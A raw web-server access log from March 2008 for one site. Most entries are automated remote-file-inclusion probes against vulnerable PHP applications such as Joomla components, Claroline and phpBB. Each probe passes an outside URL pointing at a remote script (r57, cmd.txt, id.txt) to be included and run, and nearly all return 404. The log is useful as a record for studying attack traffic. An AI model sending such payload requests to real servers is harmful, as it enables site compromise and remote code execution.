64.185.237.35 - - [02/Mar/2008:08:57:40 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
64.185.237.35 - - [02/Mar/2008:08:57:45 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
74.6.7.72 - - [02/Mar/2008:08:57:52 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:08:58:04 -0800] "GET /logs/access.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
91.195.28.2 - - [02/Mar/2008:08:58:07 -0800] "GET /index.php?pageurl=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:58:10 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
69.72.221.130 - - [02/Mar/2008:08:58:11 -0800] "GET //main.php?s=http://ljmirco.com.ar/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.11.254.36 - - [02/Mar/2008:08:58:21 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.11.254.36 - - [02/Mar/2008:08:58:21 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.11.254.36 - - [02/Mar/2008:08:58:21 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:08:58:23 -0800] "GET /logs/access_080119.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:08:58:26 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:08:58:30 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:59:27 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:08:59:54 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:09:00:04 -0800] "GET /protection.php?action=logout&siteurl=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:00:05 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
216.187.94.179 - - [02/Mar/2008:09:00:06 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:00:06 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:00:06 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:01:18 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:01:19 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:01:20 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:09:01:24 -0800] "GET /logs/access_080119.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.29.30 - - [02/Mar/2008:09:01:33 -0800] "GET /funny/terryt1.wmv HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.11.254.36 - - [02/Mar/2008:09:01:45 -0800] "GET /logs/access_080215.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.12 - - [02/Mar/2008:09:02:01 -0800] "GET /mobileoffice/?M=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:09:02:05 -0800] "GET /logs/access_080121.log//dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:09:02:05 -0800] "GET //dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:09:02:05 -0800] "GET /logs//dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:02:11 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:09:02:28 -0800] "GET /logs/access_080121.log//dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:09:02:28 -0800] "GET //dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:09:02:28 -0800] "GET /logs//dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:09:03:08 -0800] "GET /logs/access.log//dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:09:03:47 -0800] "GET /logs/access.log//dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:04:34 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:09:05:41 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:09:05:54 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:06:19 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:09:06:44 -0800] "GET /logs/access_080201.log/claroline/tracking/userLog.php?rootSys=http://h1.ripway.com/erinteam/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:09:06:45 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://h1.ripway.com/erinteam/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:09:06:45 -0800] "GET /logs/access_080201.log/claroline/tracking/userLog.php?rootSys=http://h1.ripway.com/erinteam/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:09:06:47 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://h1.ripway.com/erinteam/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:09:06:59 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.192.123 - - [02/Mar/2008:09:07:03 -0800] "GET /logs/access_080129.log/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.192.123 - - [02/Mar/2008:09:07:03 -0800] "GET /plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.192.123 - - [02/Mar/2008:09:07:03 -0800] "GET /logs/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:09:07:12 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.26.218 - - [02/Mar/2008:09:07:22 -0800] "GET /logs/access_071111.log HTTP/1.0" 200 72697 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:09:07:22 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:09:10:32 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.135.132 - - [02/Mar/2008:09:11:52 -0800] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.greytauctions.org/panji_tengkorak/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [02/Mar/2008:09:11:52 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.greytauctions.org/panji_tengkorak/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [02/Mar/2008:09:11:52 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.greytauctions.org/panji_tengkorak/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.68.175.66 - - [02/Mar/2008:09:12:03 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.justaskmarc.com//components/com_zoom/classes/iptc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
208.68.175.66 - - [02/Mar/2008:09:12:03 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.justaskmarc.com//components/com_zoom/classes/iptc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
64.135.210.75 - - [02/Mar/2008:09:12:22 -0800] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.135.210.75 - - [02/Mar/2008:09:12:23 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.135.210.75 - - [02/Mar/2008:09:12:24 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:09:12:47 -0800] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:09:12:47 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.160.33.164 - - [02/Mar/2008:09:13:16 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.192.123 - - [02/Mar/2008:09:14:19 -0800] "GET /logs/access_080104.log/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:09:15:29 -0800] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:09:16:23 -0800] "GET /index.php?command=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.192.123 - - [02/Mar/2008:09:16:27 -0800] "GET /plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.160.88 - - [02/Mar/2008:09:17:04 -0800] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:17:04 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:09:17:05 -0800] "GET /logs/access_080127.log/vwar/admin/admin.php?vwar_root=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:17:05 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:17:07 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:09:17:19 -0800] "GET /logs/vwar/admin/admin.php?vwar_root=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:09:17:45 -0800] "GET /logs/access_080211.log/index.php?command=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:09:17:46 -0800] "GET /logs/index.php?command=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:18:41 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:09:18:45 -0800] "GET /logs/access_071216.log/protection.php?action=logout&siteurl=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:18:45 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:18:46 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:09:18:46 -0800] "GET /logs/protection.php?action=logout&siteurl=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:09:18:48 -0800] "GET /logs/access_080120.log/protection.php?action=logout&siteurl=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:19:24 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:20:07 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:20:08 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:20:09 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:09:20:10 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:09:20:10 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:09:20:16 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:09:20:17 -0800] "GET //modules/My_eGallery/index.php?basepath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:09:20:53 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:09:20:53 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:09:20:53 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:09:20:53 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.vacc.org/amember/data/mod/b/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:09:20:53 -0800] "GET /logs/access_080201.log/vwar/admin/admin.php?vwar_root=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:09:20:53 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
68.142.135.142 - - [02/Mar/2008:09:20:53 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
88.191.36.35 - - [02/Mar/2008:09:21:34 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://svchost25.site.voila.fr/alls.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:09:21:44 -0800] "GET /logs/access_080131.log/index2.php?p=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:09:21:44 -0800] "GET /index2.php?p=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [02/Mar/2008:09:21:44 -0800] "GET /logs/index2.php?p=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.37.15.210 - - [02/Mar/2008:09:22:01 -0800] "GET /logs//include/inc_ext/spaw/spaw_control.class.php?spaw_root=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
77.37.15.210 - - [02/Mar/2008:09:22:04 -0800] "GET //include/inc_ext/spaw/spaw_control.class.php?spaw_root=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
88.191.36.35 - - [02/Mar/2008:09:22:08 -0800] "GET /logs/access_080123.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://svchost25.site.voila.fr/alls.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.36.35 - - [02/Mar/2008:09:22:08 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://svchost25.site.voila.fr/alls.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.36.35 - - [02/Mar/2008:09:22:08 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://svchost25.site.voila.fr/alls.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:22:30 -0800] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:09:22:34 -0800] "GET /logs/access_080211.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:09:22:36 -0800] "GET /config.inc.php?path_escape=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:09:22:36 -0800] "GET /logs/config.inc.php?path_escape=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:09:22:40 -0800] "GET /logs/access_080211.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:22:42 -0800] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:09:22:46 -0800] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:09:22:46 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:09:22:51 -0800] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:22:51 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:09:22:51 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
